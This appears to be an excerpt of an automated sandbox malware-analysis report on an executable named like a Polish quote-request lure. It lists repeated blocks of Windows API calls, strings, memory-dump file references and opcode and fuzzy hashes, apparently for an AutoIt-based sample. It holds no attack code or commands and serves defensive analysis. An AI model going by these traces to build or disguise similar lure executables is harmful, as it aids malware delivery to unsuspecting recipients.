                                                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                                                                                                                                                                                                      • _memcmp.LIBCMT ref: 004394A9
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                                                                                                                                                                                                      • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                                                                                                                                                                                                      • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                                                                                                                                                                                                      • API String ID: 1446985595-805462909
                                                                                                                                                                                                                                                      • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                                                                                                                                                      • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                                                                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                                                                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                                                                                                                                                                                                                      • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                                                                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                                                                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                                                                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1932665248-0
                                                                                                                                                                                                                                                      • Opcode ID: 44414f9333331e76e61c3163e0c64753e888bdc7369b2b88afe278c21a804e35
                                                                                                                                                                                                                                                      • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44414f9333331e76e61c3163e0c64753e888bdc7369b2b88afe278c21a804e35
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004481BA
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$LongWindow_memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 830647256-0
                                                                                                                                                                                                                                                      • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                                                                                                                                                      • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: HH
                                                                                                                                                                                                                                                      • API String ID: 0-2761332787
                                                                                                                                                                                                                                                      • Opcode ID: 1daa73f2f9fcd7e6a56dae01f278e361c1ec684145c85e10bb1a4c3ee0e3a911
                                                                                                                                                                                                                                                      • Instruction ID: 1932890218e454eaab518c2d08cf67ea4bcb6b95680f1d85a47b5a5cee1eebd3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1daa73f2f9fcd7e6a56dae01f278e361c1ec684145c85e10bb1a4c3ee0e3a911
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99A1A1726043009BD710EF65DC82B6BB3E9ABD4718F008E2EF558E7281D779E9448B5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00469289
                                                                                                                                                                                                                                                      • GetParent.USER32 ref: 004692A4
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 004692AE
                                                                                                                                                                                                                                                      • GetParent.USER32 ref: 004692C7
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$CtrlParent$_wcslen
                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                      • API String ID: 2040099840-1403004172
                                                                                                                                                                                                                                                      • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                                                                                                                                                      • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00469483
                                                                                                                                                                                                                                                      • GetParent.USER32 ref: 0046949E
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                                                                                                                                                                                                                                                      • GetParent.USER32 ref: 004694C1
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$CtrlParent$_wcslen
                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                      • API String ID: 2040099840-1403004172
                                                                                                                                                                                                                                                      • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                                                                                                                                                                                      • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0045F317
                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                                                                                                                                                                                                                                                      • IsMenu.USER32(?), ref: 0045F380
                                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 0045F3C5
                                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(?), ref: 0045F42F
                                                                                                                                                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                                                                                                                      • String ID: 0$2
                                                                                                                                                                                                                                                      • API String ID: 3311875123-3793063076
                                                                                                                                                                                                                                                      • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                                                                                                                                                      • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                                                                                                                                                      • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,004A7D14,?,004A7D14,004A8E80,004A7D14,0040F3D2), ref: 0040FFCA
                                                                                                                                                                                                                                                        • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0045358E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 978794511-0
                                                                                                                                                                                                                                                      • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                                                                                                                                                      • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressProc_malloc$_strcat_strlen
                                                                                                                                                                                                                                                      • String ID: AU3_FreeVar
                                                                                                                                                                                                                                                      • API String ID: 2184576858-771828931
                                                                                                                                                                                                                                                      • Opcode ID: fbfd85354506dc7afa549e6baf05b324e9a08f04664acd55c5acbcf5b62d546c
                                                                                                                                                                                                                                                      • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbfd85354506dc7afa549e6baf05b324e9a08f04664acd55c5acbcf5b62d546c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __snwprintf__wcsicoll_wcscpy
                                                                                                                                                                                                                                                      • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                                                                                                                                                                                                      • API String ID: 1729044348-3708979750
                                                                                                                                                                                                                                                      • Opcode ID: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
                                                                                                                                                                                                                                                      • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,004A7D14), ref: 0043719E
                                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 004371A7
                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 004371C0
                                                                                                                                                                                                                                                      • _printf.LIBCMT ref: 004371EC
                                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HandleLoadModuleString$Message_printf
                                                                                                                                                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                      • API String ID: 220974073-3128320259
                                                                                                                                                                                                                                                      • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                                                                                                                                                      • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
